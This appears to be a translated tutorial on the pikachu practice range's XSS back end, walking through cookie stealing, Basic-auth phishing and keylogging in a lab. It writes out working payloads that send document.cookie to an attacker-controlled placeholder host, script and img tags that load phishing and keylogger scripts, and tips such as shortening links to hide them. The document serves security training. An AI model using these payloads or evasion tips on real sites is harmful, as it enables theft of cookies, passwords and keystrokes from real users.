Important note written in front:
Attention : There is no good or bad technology, the key lies in the people or organizations that use the technology. Network security technology is a double-edged sword – as a network security person, although we cannot control whether the hat on our head will turn green, we can control it from turning black; no matter how much material temptation we face or face What a difficult dilemma, you must not give up your ideal of becoming a top white hat in the first place. Along the way, we may not be able to use our own technology to promote the progress and development of the network security cause, but we must not and cannot stand on the opposite side of the development of the network security cause.
Warning : This article is limited to technical exchanges, and all illegal and criminal activities using the technologies involved in this article are prohibited. Any violation will be at your own risk. And the author recommends that all network security practitioners familiarize themselves with and recite the relevant laws and regulations of my country's network security, which is also an act of being responsible for their careers.
One: Introduction to the XSS background under the pikachu management tool
The XSS background under the pikachu management tool is a platform to help learners understand the principles and hazards of XSS vulnerabilities through three practical experiments: cookie stealing and utilization, phishing attacks, and keyboard behavior recording. It is designed to help learners deeply understand the theory in actual combat, so that they can better defend against XSS vulnerabilities.
Xss background login page:
Xss background main page:
Two: Start the XSS background
Method 1: Directly enter the management tool module of the pikachu shooting range —> enter the XSS background. (For the first use, you need to create a database first)
Method 2: The XSS background is an independent file in the pikachu shooting range file: pkxss. If you don’t want to deploy the entire pikachu shooting range, you can deploy the pkxss file separately in the attacking host and build the XSS background separately. (For example: the author deploys it in the PHPstudy of the virtual machine – the deployment method is the same as that of the shooting range. Readers who don’t understand can read the author’s article on shooting range deployment)
Three: Practical Experimental Demonstration
- cookie stealing
GET type:
Schematic:
Step 1: Modify the configuration file
1) Enter the pkxss directory to find xcookie, open the cookie.php file to modify the configuration. (E:\phpstudy_pro\WWW\Test\pkxss\xcookie\cookie.php).
Modify the URL in the box: This URL address means redirecting to a trusted IP address. In other words, when the attacker triggers the attack code to be attacked, the page jumps (refreshes) to this URL address. The purpose of this is The web page jump caused during the attack can reduce or even eliminate the suspicion of the attacked. (The author deploys pikachu in the local PHPstudy: E:\phpstudy_pro\WWW\Test\pikachu-master, this RUL means: when under attack, the page jumps to the home page of the pikachu shooting range).
Step 2: Construct the attack code
1) Construct an attack code to obtain cookies, and inject the code through the XSS vulnerability into the site that the attacked host may browse and have the XSS vulnerability, and wait for the attack to succeed.
In order to help readers understand, the XSS storage vulnerability in the pikachu shooting range is used for demonstration.
- Check whether the cookie acquisition module under the XSS platform has historical data.
(2) Construct attack code: <script>document.location = 'http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php ?cookie=' + document.cookie;</script >
(Note: The http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php page in the attack code means that when the user triggers the attack code, the attack code runs to collect the user’s Cookie, and Send the cookie to this URL page. Of course, this URL is controlled by the attacker)
Step 3: Inject the code into the page through the input box or web page URL
Note: Since the injection box has set a character input limit, you need to open the code debugging tool (right click -> check) to change the character input limit
Step Four: View Records
POST type:
principle:
The basic principles of the POST type and the GET type are quite similar. The main difference is that the parameter submission method is a form submission, and parameters cannot be submitted through the URL, so the attacker cannot embed malicious code through the URL. Therefore, the attacker needs to construct a Form form. When the user clicks on the form link of the attacker, the user sends a submission request for the attacker, and the subsequent attack steps are consistent with the GET type.
The first step: constructing the Form form
1) Modify the configuration
Modify the files in the pkxss directory: pkxss/xcookie/post.html
- Fill in the white box with the user server IP address and file path: such as: http://pikachu/pkxss/xcookie/pkxss_cookie_result.php
- Fill in the yellow box with the machine IP and file path controlled by the attacker: http://pikachu/pkxss/xcookie/cookie.php
Step 2: On the login page, enter the attack code in the attack box (the steps are the same as the GET type): <script>document.location = 'http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/ cookie.php?cookie=' + document.cookie;</script>
Step 3: View the attack results:
- phishing attack
The idea of phishing attack: The attacker sends a processed link request to the client. After the user clicks on the link, a request will be sent to the backend built by the attacker in advance. After receiving the request, the backend will return a Basic header for identity information verification. For the client, if the user is not aware of security enough, sensitive information is entered: username and password. This information will be sent to the XSS background controlled by the attacker.
Step 1: Configuration File
Configure the fish.php file in the pkxss/xfish directory: configure the information in the red box of the picture as the background address of the file controlled by the attacker to obtain the information of the victim: for example: http://pikachu/pkxss/xfish/xfish . php (the address of the author's local pikachu XSS background management platform)
Step 2: Construct a phishing attack link
Note: There is an interface (xfish.php) in the background of fishing to obtain remote data, and the account password is obtained through the get method and stored in the library. File address: pikachu/pkxss/xfish/xfish.php
Construct a link that can access the background controlled by the attacker and return Basic authentication, or it can be a tag, img tag, script tag, etc.
Note: In order to prevent the constructed phishing link from being discovered by the attacker, you can use the corresponding link processing tool to process the link.
Link processing platform: http://tools.jb51.net/password/dwzcreate
like:
Link 1: http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php
After platform processing: http://mrw.so/6oy3Hb
链接2:<img src="http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php"></img>
链接3:<script src="http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php"></script>
Step 3: Use the pikachu range test
1) Embed the constructed phishing link into the pikachu shooting range, click submit, and an input box will pop up.
2) Enter the user name: Classmate Beiming; password: 123456. Click to Login.
Step 4: Check the background results
- get keylogger
Keylogging attack principle: use XSS vulnerability to inject attack code into the page, when the victim visits the page, any operation on the page will be recorded, and the attack code will send the record to the background controlled by the attacker.
Step 1: Modify the configuration
1) Copy pkxss/rkeypress/rk.js under the pikachu shooting range file directory. The content in the red box in the figure is replaced with the background address controlled by the attacker to obtain the keylogged file of the attacker. Such as: http://pikachu/pkxss/rkeypress/rkserver.php
2) Modify the rkserver.php file (path: pkxss/rkeypress/rkserver.php).
Set whether to allow cross-domain access to: all. [For the knowledge analysis of browser cross-domain access, you can view the author's blog post: 】
Step 2: Construct the attack code
<script src= "http://xxx.xxx.xxx/Pikachu-master/pkxss/rkeypress/rk.js"></script>
Step 3: Use the pikachu shooting range verification
1. Inject the attack code into a page with an XSS vulnerability, and wait for the victim to visit the page.
2. The attacked user visits the page and adds a comment: Classmate Bei Ming, triggering the attack.
3. Enter the XSS background to view the attacked keylogger.